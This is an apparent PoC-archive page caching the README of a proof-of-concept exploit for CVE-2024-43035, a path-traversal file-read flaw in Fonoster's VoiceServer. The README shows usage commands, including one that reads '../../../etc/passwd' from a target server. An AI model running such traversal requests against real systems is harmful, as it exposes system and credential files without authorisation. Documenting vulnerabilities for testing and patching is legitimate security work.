Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-43035 PoC — Fonoster 安全漏洞

Source
Associated Vulnerability
Title:Fonoster 安全漏洞 (CVE-2024-43035)
Description:Fonoster是Fonoster开源的一个云通信平台。 Fonoster 0.6.1之前版本存在安全漏洞,该漏洞源于VoiceServer端点存在目录遍历,可能导致读取任意文件。
Description
Proof-of-concept exploit for Fonoster LFI vulnerability (CVE-2024-43035)
Readme
# CVE-2024-43035 - Fonoster LFI Proof of Concept

This repository contains a Proof of Concept (PoC) script demonstrating a [Local File Inclusion vulnerability in Fonoster](https://zeropath.com/blog/fonoster-voiceserver-lfi-vulnerability). **This tool is for educational and authorized testing purposes only.**

## Usage

### Read Local File
To retrieve a local file from the server:
```
python3 fonoster_lfi_poc.py --url <fonoster_server_url> --path <file_path_to_retrieve>
```

Example:

```
python3 fonoster_lfi_poc.py --url http://example.com --path "../../../etc/passwd"
```
z
File Snapshot

[4.0K] /data/pocs/5d01b18f811aa85f1497b342ab6f9f4ad21a8cb3 ├── [1.3K] fonoster_lfi_poc.py └── [ 581] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.